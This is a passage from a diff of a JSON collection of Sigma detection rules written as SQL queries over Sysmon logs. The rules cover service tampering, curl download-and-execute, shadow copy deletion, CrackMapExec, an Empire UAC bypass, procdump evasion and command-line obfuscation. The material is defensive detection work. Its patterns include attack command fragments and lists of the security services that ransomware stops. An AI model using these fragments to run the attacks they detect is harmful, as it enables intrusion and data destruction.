'%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE 
'%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL 
Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR 
CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_openwith.yml" + "filename": "proc_creation_win_susp_service_tamper.yml" }, { - "title": "Suspicious Double Extension File Execution", - "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", - "status": "stable", - "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", - "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", + "title": "Disabled IE Security Features", + "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "status": "test", + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%.doc.exe' ESCAPE '\\' OR Image LIKE '%.docx.exe' ESCAPE '\\' OR Image LIKE '%.xls.exe' ESCAPE '\\' OR Image LIKE '%.xlsx.exe' ESCAPE '\\' OR Image LIKE '%.ppt.exe' ESCAPE '\\' OR Image LIKE '%.pptx.exe' ESCAPE '\\' OR Image LIKE '%.rtf.exe' ESCAPE '\\' OR Image LIKE '%.pdf.exe' ESCAPE '\\' OR Image LIKE '%.txt.exe' ESCAPE '\\' OR Image LIKE '% .exe' ESCAPE '\\' OR Image LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR Image LIKE '%.doc.js' ESCAPE '\\' OR Image LIKE '%.docx.js' ESCAPE '\\' OR Image LIKE '%.xls.js' ESCAPE '\\' OR Image LIKE '%.xlsx.js' ESCAPE '\\' OR Image LIKE '%.ppt.js' ESCAPE '\\' OR Image LIKE '%.pptx.js' ESCAPE '\\' OR Image LIKE '%.rtf.js' ESCAPE '\\' OR Image LIKE '%.pdf.js' ESCAPE '\\' OR Image LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE 
'% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_double_extension.yml" + "filename": "proc_creation_win_powershell_disable_ie_features.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features", - "id": "a383dec4-deec-4e6e-913b-ed9249670848", - "status": "experimental", - "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], + "title": "HackTool - CrackMapExec Execution", + "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "status": "test", + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') 
OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" }, { "title": "Suspicious Regsvr32 Execution With Image Extension", 
@@ -12474,1656 +12115,1627 @@ "filename": "proc_creation_win_regsvr32_image.yml" }, { - "title": "Curl Download And Execute Combination", - "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", - "status": "test", - "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", - "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", + "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", + "status": "experimental", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" + "filename": 
"proc_creation_win_powershell_shadowcopy_deletion.yml" }, { - "title": "Conti NTDS Exfiltration Command", - "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "title": "Potential Procdump Evasion", + "id": "79b06761-465f-4f88-9ef2-150e24d3d737", "status": "test", - "description": "Detects a command used by conti to exfiltrate NTDS", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Cases in which procdump just gets copied to a different directory without any renaming" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_7zip.yml" + "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" }, { - "title": "PUA - CleanWipe Execution", - "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", + "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", "status": 
"experimental", - "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Legitimate administrative use (Should be investigated either way)" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (Image LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (Image LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (Image LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE 
'\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_cleanwipe.yml" + "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" }, { - "title": "HackTool - Empire PowerShell UAC Bypass", - "id": "3268b746-88d8-4cd3-bffc-30077d02c787", - "status": "stable", - "description": "Detects some Empire PowerShell UAC bypass methods", - "author": "Ecco", + "title": "Renamed Vmnat.exe Execution", + "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "status": "experimental", + "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", + "author": "elhoim", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'vmnat.exe' AND NOT ((Image LIKE '%vmnat.exe' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_hktl_empire_powershell_uac_bypass.yml" + "filename": "proc_creation_win_renamed_vmnat.yml" }, { - "title": "Renamed CreateDump Utility Execution", - "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", - "status": "experimental", - "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious RazerInstaller Explorer Subprocess", + "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "status": "test", + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1553" ], "falsepositives": [ - "Command lines that use the same flags" + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\createdump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (Image LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_createdump.yml" + "filename": 
"proc_creation_win_exploit_other_razorinstaller_lpe.yml" }, { - "title": "Using SettingSyncHost.exe as LOLBin", - "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "title": "Potential Commandline Obfuscation Using Unicode Characters", + "id": "e0552b19-5a83-4222-b141-b36184bb8d79", "status": "test", - "description": "Detects using SettingSyncHost.exe to run hijacked binary", - "author": "Anton Kutepov, oscd.community", + "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1574.008" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_lolbin_settingsynchost.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" }, { - "title": "Reg Add Suspicious Paths", - "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", - "status": "experimental", - "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", - "author": "frack113, Nasreddine Bencherchali", + "title": "Suspicious WebDav Client Execution", + "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "status": "experimental", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562.001" + "attack.exfiltration", + "attack.t1048.003", + "cve.2023.23397" ], "falsepositives": [ - "Rare legitimate add to registry via cli (to these locations)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image 